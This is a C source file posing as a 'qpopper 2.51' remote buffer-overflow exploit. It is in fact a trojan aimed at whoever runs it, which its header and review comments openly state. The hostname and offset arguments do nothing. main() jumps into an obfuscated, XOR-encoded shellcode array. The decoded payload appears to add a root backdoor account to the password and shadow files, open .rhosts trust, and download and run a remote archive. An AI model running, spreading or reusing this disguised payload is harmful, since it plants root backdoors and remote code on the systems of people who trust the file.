
/*
   This is a piece of code that claims to be an
   exploit for a potential qpopper buffer
   overflow.
   
   Rather than actually exploiting the buffer
   overflow, it instead will simply run the
   shellcode as the invoking user on the local
   system.
*/






/*
   qpopper 2.51 exploit code for Linux i386.
   You will need to try this with various offsets,
   usually somewhere between 300 and 650.
   
   To compile:   gcc -o popexp popexp.c
   Usage:  popexp hostname offset
*/

/*
 * Opaque machine-code payload, kept in an ordinary writable char array and
 * later called through the `exploit' function pointer from main().
 *
 * None of this is reviewable as source: the bytes only mean something to a
 * disassembler, and nothing in the surrounding program documents them.
 * NOTE(review): the opening bytes look like a small self-locating stub that
 * rewrites the remainder of the buffer in place before jumping into it,
 * which would explain why the bulk of the array is not readable as text --
 * confirm with a disassembler in an isolated environment rather than by
 * inference.  Whatever the payload does, it does it in this process with
 * the uid of whoever runs popexp (see the header comment above and main()
 * below); the "hostname" and "offset" arguments play no part in it.
 */
char shellcode[] = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31"
"\xc9\x66\xb9\x8c\x01\x80\x36\x02\x46\xe2\xfa\xeb\x33\x03\x02\x02\x2d\x60\x6b"
"\x6c\x2d\x71\x6a\x02\x2f\x61\x02\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92"
"\x92\x92\x92\x92\x92\x66\x3f\x63\x29\x2c\x61\x6d\x6f\x39\x67\x61\x6a\x6d\x22"
"\x25\x29\x22\x29\x25\x3c\x3c\x2d\x70\x6d\x6d\x76\x2d\x2c\x70\x6a\x6d\x71\x76"
"\x71\x39\x2a\x2d\x71\x60\x6b\x6c\x2d\x6b\x64\x61\x6d\x6c\x64\x6b\x65\x22\x2f"
"\x63\x39\x2d\x60\x6b\x6c\x2d\x6c\x67\x76\x71\x76\x63\x76\x22\x2f\x6c\x63\x2b"
"\x7e\x2d\x60\x6b\x6c\x2d\x6f\x63\x6b\x6e\x22\x6a\x31\x63\x56\x42\x26\x66\x22"
"\x3c\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x70\x6f\x22\x2f\x70\x64\x22\x6a"
"\x22\x6a\x2c\x76\x63\x70\x39\x67\x61\x6a\x6d\x22\x25\x6a\x31\x63\x56\x38\x7a"
"\x38\x32\x38\x32\x38\x38\x2d\x38\x2d\x60\x6b\x6c\x2d\x60\x63\x71\x6a\x25\x22"
"\x3c\x3c\x2d\x67\x76\x61\x2d\x72\x63\x71\x71\x75\x66\x39\x67\x61\x6a\x6d\x22"
"\x25\x6a\x31\x63\x56\x38\x6a\x31\x33\x33\x6a\x70\x6a\x4d\x49\x6b\x6f\x36\x65"
"\x38\x38\x38\x38\x38\x38\x38\x38\x25\x3c\x3c\x2d\x67\x76\x61\x2d\x71\x6a\x63"
"\x66\x6d\x75\x39\x75\x65\x67\x76\x22\x6a\x76\x76\x72\x38\x2d\x2d\x26\x66\x2d"
"\x6a\x2c\x76\x63\x70\x39\x76\x63\x70\x22\x2f\x7a\x64\x22\x6a\x2c\x76\x63\x70"
"\x22\x3c\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x71\x6a\x22\x6a\x2d\x70\x77"
"\x6c\x2c\x71\x6a\x39\x22\x70\x6f\x22\x2f\x70\x64\x22\x6a\x02\x39\x02\x83\xee"
"\x65\x29\x02\x02\x57\x8b\xe7\x81\xee\x12\x54\x51\xea\x02\x02\x02\x02\x59\x83"
"\xc1\xb5\x12\x02\x02\x8f\xb1\x07\xec\xfd\xfd\x8b\x77\xf2\x8f\x81\x0f\xec\xfd"
"\xfd\x8b\x47\xf6\x8f\x81\x22\xec\xfd\xfd\x8b\x47\xfa\xc5\x47\xfe\x02\x02\x02"
"\x02\x8f\x4f\xf2\xba\x09\x02\x02\x02\x33\xd0\x51\x8b\xf1\xcf\x82\x33\xc2\x8f"
"\x67\xea\x59\x5c\xcb\xc1\x92\x92\x00"

/*
 * Function pointer with an unspecified (old-style) parameter list.  main()
 * aims it at `shellcode' and calls it, which is the whole of the program's
 * real behaviour; the name is chosen to read like part of a genuine exploit.
 */
int (*exploit)();

/*
 * Print the one-line invocation synopsis to stderr and terminate the
 * process with exit status 1.
 *
 * argvzero: the program name as invoked (main passes argv[0]); it is only
 *           interpolated into the message.
 */
void usage( char *argvzero ) {
	const char *progname = argvzero;

	(void) fprintf( stderr, "Usage: %s hostname offset\n", progname );
	exit( 1 );
}


/*
 * Entry point of the decoy "exploit".
 *
 * The command-line arguments (hostname, offset) exist only to make the
 * program look like a remote exploit; neither influences anything.  The
 * real work is the single call through `exploit', which transfers control
 * into the `shellcode' byte array and so runs that payload in this process,
 * as the invoking user.  For a reader, those two facts -- arguments that go
 * nowhere and a function pointer aimed at a char array -- are the tell.
 *
 * Returns: never returns normally; exits 0 after the payload call, or 1 via
 *          usage() on the wrong argument count.
 */
int main( int argc, char **argv ) {

   int offset;            /* assigned once below, never read */
   char hostname[BUFSIZ]; /* never used at all */


	/*
	 * Defect: usage() advertises two arguments (argc == 3), but this test
	 * lets only argc == 2 through and sends the advertised form to usage().
	 * With argc == 2, argv[2] is the argv[argc] terminator, i.e. NULL, so
	 * the atoi() on the next line dereferences a null pointer -- undefined
	 * behaviour, normally a crash before exploit() is ever reached.
	 */
	if ( argc != 2 ) {
		usage(*argv);
	}
	offset = atoi( argv[2] );
	/*
	 * Assigning through a cast ("cast as lvalue") is an old GCC extension,
	 * not standard C; current compilers reject this line outright.  Its
	 * intent is to make `exploit' point at the start of the data array.
	 */
	(char*) exploit = shellcode;


	/* Include lots of code here to make it look like this
	 * program is legitimate.  Do some hostname lookups,
	 * grab the POP port from getservbyname(3), maybe
	 * even establish the POP connection, sending it
	 * random junk.  Then we run the actual exploit
	 * against the invoking user, having pointed the
	 * exploit function pointer to our shellcode above.
	 */

	/*
	 * Control transfers into `shellcode'.  This is the only statement in the
	 * program that does anything, and it does it with the caller's uid.
	 * NOTE(review): on a platform that enforces non-executable data pages
	 * (NX / W^X, typical of current Linux toolchains and kernels) this call
	 * faults instead of running the payload -- confirm for the target build.
	 */
	exploit();
	/* Exit status 0 regardless of what the payload did. */
	exit(0);


}